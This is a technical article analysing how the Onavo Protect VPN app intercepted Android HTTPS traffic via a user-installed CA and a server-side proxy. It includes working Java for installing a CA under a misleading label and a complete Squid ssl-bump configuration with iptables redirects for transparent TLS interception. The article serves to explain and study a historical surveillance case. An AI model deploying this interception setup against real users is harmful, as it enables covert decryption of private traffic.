
Reverse engineering of the Onavo Protect VPN service for Android has revealed how an application can intercept encrypted HTTPS traffic on a mobile device. In short, an attacker needs two things on the phone: their own application and a CA certificate in the device's trust store. The relevance is not only historical: a law has come into force in the Russian Federation that requires specific applications to be pre-installed on all smartphones from 2025. In theory, a vulnerability in any such pre-installed application could put the security of many users at risk.
A technical analysis of how the Facebook mobile application behaved on devices with Onavo Protect installed (a "security" program that works as a VPN) gives a concrete example of such interception.
Background
Court documents show that the company's internal surveillance project was called Project Ghostbusters. It was part of the In-App Action Panel (IAPP) program, which used a technique to "intercept and decrypt" encrypted app traffic from Snapchat users, and later from YouTube and Amazon users. Initially, this was done for the purpose of collecting analytics, i.e., monitoring user activity.
To do this, the developers used a program called Onavo Protect, which Facebook bought in 2013. In 2019, the service was shut down after an investigation into its misuse, and the company was later fined.
Technical analysis
In this case, HTTPS traffic was intercepted with a man-in-the-middle (MITM) attack. The developers themselves called the technique "ssl bump", after the feature of the same name in the Squid caching proxy. The attack is shown schematically in the article's lead image.
The interception was carried out by the Onavo Protect mobile application, which prompted the user to install a CA certificate into the device's trusted credential store. In addition, the feature required several permissions on the phone, which the application allegedly requested "to display traffic statistics":

While the court documents say the certificates are "generated on the server and sent to the device", some older versions of the app contain the certificates directly, as the embedded assets old_ca.cer and new_ca.cer:

The certificates are located in the assets folder:

One of the certificates is valid until 2027. The application code contains a method that installs the certificate via KeyChain.createInstallIntent():

There is also a procedure that checks whether the certificate is installed:

This method was used only in early versions of the program; since Android 7 the user has had to install certificates manually. Note also that starting with Android 7 (Nougat), apps targeting API level 24 or higher no longer trust user-installed CAs by default and must opt in through their network security configuration, so a user-added root is no longer automatically "valid for all applications".
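The two routines the article found in the app (launch the system CA-install dialog with a certificate bundled in assets, and check afterwards whether it landed in the trust store) look roughly like the following. This is an added example written for this page, not code from the Onavo APK; it assumes the certificate is shipped as assets/new_ca.cer, and the class name, request code and the "Traffic statistics" label are hypothetical.

```java
// Added example (not Onavo's code): how an Android app can ask the user to
// install a bundled CA certificate and later check whether it is trusted.
// Assumes the CA ships as assets/new_ca.cer (DER or PEM); class and method
// names are hypothetical.
import android.app.Activity;
import android.content.Intent;
import android.security.KeyChain;
import java.io.InputStream;
import java.security.KeyStore;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;

public class CaInstaller {
    private static final int REQ_INSTALL_CA = 0x4341; // hypothetical request code

    /** Reads the CA certificate out of the APK's assets folder. */
    static X509Certificate loadBundledCa(Activity activity) throws Exception {
        try (InputStream in = activity.getAssets().open("new_ca.cer")) {
            CertificateFactory cf = CertificateFactory.getInstance("X.509");
            return (X509Certificate) cf.generateCertificate(in);
        }
    }

    /**
     * Launches the system dialog that installs the CA into the *user* trust store.
     * The user must confirm in the dialog. On Android 11 and later this intent no
     * longer installs CA certificates at all; the user has to go through Settings.
     */
    static void promptInstall(Activity activity, X509Certificate ca) throws Exception {
        Intent intent = KeyChain.createInstallIntent();
        intent.putExtra(KeyChain.EXTRA_CERTIFICATE, ca.getEncoded());
        // Label shown to the user; an innocuous name hides the certificate's real purpose.
        intent.putExtra(KeyChain.EXTRA_NAME, "Traffic statistics");
        activity.startActivityForResult(intent, REQ_INSTALL_CA);
    }

    /**
     * Checks the combined system/user CA store for our certificate.
     * "AndroidCAStore" exposes system roots under "system:..." aliases and
     * user-added roots under "user:..." aliases.
     */
    static boolean isInstalled(X509Certificate ca) throws Exception {
        KeyStore ks = KeyStore.getInstance("AndroidCAStore");
        ks.load(null, null);
        String alias = ks.getCertificateAlias(ca);
        return alias != null && alias.startsWith("user:");
    }
}
```

Even when isInstalled() returns true, an app targeting API level 24 or higher only trusts that root if its network_security_config.xml includes `<certificates src="user" />` in its trust anchors; this is why a user-added CA stopped being "valid for all applications" after Android 7.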
All device traffic then went through the VPN to infrastructure controlled by the attacker, where it was redirected to a Squid caching proxy configured as a transparent proxy with ssl bump enabled.
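For readers who have not seen the server side of this technique, the following is a minimal Squid 4.x configuration that performs ssl bump on intercepted HTTPS. It is an added illustration and is not taken from the court documents or from Onavo's infrastructure; the ports, file paths, CA file name and the tun0 interface in the iptables comment are assumptions. It only works because the client already trusts the CA in /etc/squid/onavo_ca.pem, which for Onavo was the certificate the app asked the user to install.

```conf
# Added example (not Onavo's configuration): Squid as a transparent
# TLS-intercepting proxy. Assumes the VPN server routes client traffic through
# this host and that the client trusts /etc/squid/onavo_ca.pem.
#
# Traffic arriving on the VPN interface is redirected to Squid (assumed tun0):
#   iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 80  -j REDIRECT --to-port 3128
#   iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 443 -j REDIRECT --to-port 3129

# Plain HTTP, transparently intercepted.
http_port 3128 intercept

# Intercepted HTTPS. Squid terminates TLS with a leaf certificate it mints on
# the fly for the requested host, signed by the CA the victim already trusts.
https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB tls-cert=/etc/squid/onavo_ca.pem tls-key=/etc/squid/onavo_ca.key

# Helper that generates and caches the forged per-host certificates.
sslcrtd_program /usr/lib/squid/security_file_certgen -s /var/lib/squid/ssl_db -M 4MB

# Step 1: peek at the ClientHello to learn the SNI, then bump (decrypt) everything.
acl step1 at_step SslBump1
ssl_bump peek step1
ssl_bump bump all

# Once bumped, requests are logged and can be inspected like plain HTTP.
access_log /var/log/squid/access.log squid
http_access allow all
```

Replacing `ssl_bump bump all` with `ssl_bump splice all` would pass the TLS session through untouched; the difference between those two lines is the whole of the "intercept and decrypt" capability described in the court documents.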
Copy of the email describing the technique from the court documents:

In addition to its main function of collecting analytics from other applications by abusing the permissions granted by the user, Onavo had functions for obtaining other sensitive data, such as the subscriber's IMSI:

Although the story happened several years ago, it remains technically interesting as an illustration of how far app developers can go by abusing permissions on mobile phones (the developer is currently being sued). The way the CA installation procedure was launched, and how the certificates were added to the operating system, are also worth studying.
Shortly after the events described, in 2020, Android 11 was released. On it an application can no longer install its own CA certificate through the system dialog, let alone one trusted by all applications: the user must add the certificate manually through Settings, and apps still trust it only if they opt in. On new smartphones, developers therefore resort to other techniques, such as the Accessibility API.